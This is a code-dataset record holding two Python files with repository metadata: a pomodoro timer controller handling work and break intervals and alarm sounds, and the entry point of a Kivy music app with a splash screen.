from __future__ import annotations from enum import Enum from typing import List import os.path as path import stargazing.data.database as database import stargazing.audio.audio_controller as audio_ac import stargazing.audio.audio_player as audio_ap import stargazing.pomodoro.timer as pomo_t import stargazing.project.project_controller as proj_pc from stargazing.utils.format_funcs import format_pomodoro_time ALARM_START_PATH = f"{path.dirname(path.abspath(__file__))}/../res/alarm_start.mp3" ALARM_FINISH_PATH = f"{path.dirname(path.abspath(__file__))}/../res/alarm_finish.mp3" class PomodoroIntervalSettings(): """Interval settings for the pomodoro timer. @param work_secs: Number of seconds for the work interval of the timer. @param break_secs: Number of seconds for the break interval of the timer.""" def __init__(self, work_secs: int, break_secs: int) -> None: self.work_secs = work_secs self.break_secs = break_secs @property def name(self) -> str: return f"{format_pomodoro_time(self.work_secs, False)} + {format_pomodoro_time(self.break_secs, False)}" def __eq__(self, o: PomodoroIntervalSettings) -> bool: return self.work_secs == o.work_secs and self.break_secs == o.break_secs def __ne__(self, o: PomodoroIntervalSettings) -> bool: return not self.__eq__(o) class PomodoroStatus(Enum): INACTIVE = "inactive" WORK = "work" BREAK = "break" PAUSED_WORK = "paused work" PAUSED_BREAK = "paused break" FINISHED_WORK = "finished work" FINISHED_BREAK = "finished break" class PomodoroController(): """Pomodoro manager, containing current pomodoro timer, status, autostart option and interval settings. @param project_controller: Instance of a project controller. @param audio_controller: Instance of an audio controller.""" def __init__(self, project_controller: proj_pc.ProjectController, audio_controller: audio_ac.AudioController, interval_time: PomodoroIntervalSettings = None, last_autostart=True) -> None: self.project_controller = project_controller self.audio_controller = audio_controller self.interval_settings = interval_time if interval_time else PomodoroIntervalSettings( 2400, 600) self.autostart_setting = last_autostart self.timer = pomo_t.Timer(self.interval_settings.work_secs) self.status = PomodoroStatus.INACTIVE def finish_timer(self, disable_sound=False) -> None: if self.status in (PomodoroStatus.WORK, PomodoroStatus.PAUSED_WORK): database.insert_pomodoro( self.project_controller.current, self.timer) self.timer = pomo_t.Timer(self.interval_settings.break_secs) if not disable_sound: self.__play_alarm_sound(ALARM_FINISH_PATH) if self.autostart_setting: self.timer.start() self.status = PomodoroStatus.BREAK else: self.status = PomodoroStatus.FINISHED_WORK elif self.status in (PomodoroStatus.BREAK, PomodoroStatus.PAUSED_BREAK): self.timer = pomo_t.Timer(self.interval_settings.work_secs) if self.autostart_setting: self.timer.start() self.status = PomodoroStatus.WORK if not disable_sound: self.__play_alarm_sound(ALARM_START_PATH) else: self.status = PomodoroStatus.FINISHED_BREAK def reset_timer(self) -> None: if self.status in (PomodoroStatus.WORK, PomodoroStatus.PAUSED_WORK, PomodoroStatus.FINISHED_WORK): database.insert_pomodoro( self.project_controller.current, self.timer) self.timer = pomo_t.Timer(self.interval_settings.work_secs) self.timer.start() self.status = PomodoroStatus.WORK elif self.status in (PomodoroStatus.BREAK, PomodoroStatus.PAUSED_BREAK, PomodoroStatus.FINISHED_BREAK): self.timer = pomo_t.Timer(self.interval_settings.break_secs) self.timer.start() self.status = PomodoroStatus.BREAK def update_timer(self) -> None: time_diff, timer_complete = self.timer.update() if self.status == PomodoroStatus.WORK: self.project_controller.add_todays_total_time(time_diff) self.project_controller.current.add_time(time_diff, True) if timer_complete: self.finish_timer() def toggle_start_stop(self) -> None: if self.status in (PomodoroStatus.INACTIVE, PomodoroStatus.FINISHED_BREAK): self.timer.start() self.status = PomodoroStatus.WORK self.__play_alarm_sound(ALARM_START_PATH) elif self.status == PomodoroStatus.PAUSED_WORK: self.timer.continue_() self.status = PomodoroStatus.WORK elif self.status == PomodoroStatus.FINISHED_WORK: self.timer.start() self.status = PomodoroStatus.BREAK elif self.status == PomodoroStatus.PAUSED_BREAK: self.timer.continue_() self.status = PomodoroStatus.BREAK elif self.status == PomodoroStatus.WORK: self.timer.pause() self.status = PomodoroStatus.PAUSED_WORK elif self.status == PomodoroStatus.BREAK: self.timer.pause() self.status = PomodoroStatus.PAUSED_BREAK def set_interval_settings(self, interval_settings: PomodoroIntervalSettings) -> None: self.interval_settings = interval_settings # Edit current timer settings without resetting if self.status in (PomodoroStatus.INACTIVE, PomodoroStatus.WORK, PomodoroStatus.PAUSED_WORK): self.timer.interval = interval_settings.work_secs else: self.timer.interval = interval_settings.break_secs def __play_alarm_sound(self, path) -> None: curr_vol = self.audio_controller.get_volume() audio_decr = 15 self.audio_controller.set_volume(max(curr_vol - audio_decr, 0)) alarm = audio_ap.AudioPlayer(path) alarm.set_volume(curr_vol) alarm.play() # TODO: this needs to be async - wait for the alarm length self.audio_controller.set_volume(curr_vol) @property def timer_display(self) -> str: if self.status in (PomodoroStatus.INACTIVE, PomodoroStatus.FINISHED_BREAK): return "START TIMER" elif self.status == PomodoroStatus.WORK: return f"BREAK IN {self.timer.remaining_time}" elif self.status == PomodoroStatus.BREAK: return f"POMODORO IN {self.timer.remaining_time}" elif self.status == PomodoroStatus.PAUSED_WORK: return f"PAUSED [WORK {self.timer.remaining_time}]" elif self.status == PomodoroStatus.PAUSED_BREAK: return f"PAUSED [BREAK {self.timer.remaining_time}]" elif self.status == PomodoroStatus.FINISHED_WORK: return "START BREAK"
39.072222
113
0.681928
815
7,033
5.640491
0.159509
0.067435
0.125299
0.060909
0.510333
0.415271
0.376115
0.29454
0.258864
0.159887
0
0.002231
0.235177
7,033
179
114
39.290503
0.852389
0.072942
0
0.390625
0
0
0.071473
0.047443
0
0
0
0.005587
0
1
0.09375
false
0
0.078125
0.023438
0.320313
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
41567d586e7fa12a33d4c69f999c3c3a2e0316df
1,324
py
Python
main.py
anandnet/Virtual-Music
d13e6fa83d92816064cad4cce61c7c499d54e921
[ "MIT" ]
1
2021-02-20T05:56:49.000Z
2021-02-20T05:56:49.000Z
main.py
anandnet/Virtual-Music
d13e6fa83d92816064cad4cce61c7c499d54e921
[ "MIT" ]
null
null
null
main.py
anandnet/Virtual-Music
d13e6fa83d92816064cad4cce61c7c499d54e921
[ "MIT" ]
1
2021-02-18T05:59:59.000Z
2021-02-18T05:59:59.000Z
from logging import root from os import name from kivy.animation import Animation from kivy.clock import Clock from kivy.lang import Builder from widgets.loader import Loader from kivy.uix.behaviors import button from kivy.uix.boxlayout import BoxLayout from kivy.uix.anchorlayout import AnchorLayout from kivy.uix.image import Image from kivymd.app import MDApp from kivy.uix.screenmanager import Screen, ScreenManager from kivy.uix.button import Button from screens.splash import SplashScreen class MainApp(MDApp): def __init__(self, **kwargs): self.title = "Vitual Music" self.icon='assets/icons/app_icon.jpeg' super().__init__(**kwargs) def build(self): self.theme_cls.theme_style="Dark" self.theme_cls.primary_palette ="Purple" Clock.schedule_once(self.load_file, 5) self.manager = ScreenManager() splash_scr = SplashScreen(name="splash") self.manager.add_widget(splash_scr) self.root = self.manager def load_file(self, *args): a_pp = Builder.load_file("gui.kv") main_scr = Screen(name="main") main_scr.add_widget(a_pp) self.root.add_widget(main_scr) self.root.current = "main" class Root(BoxLayout): pass if __name__ == "__main__": MainApp().run() """ 0.5,0.1,1,1 """
25.960784
56
0.701662
184
1,324
4.858696
0.380435
0.080537
0.073826
0
0
0
0
0
0
0
0
0.006579
0.196375
1,324
50
57
26.48
0.833647
0
0
0
0
0
0.058238
0.019923
0
0
0
0
0
1
0.081081
false
0.027027
0.378378
0
0.513514
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2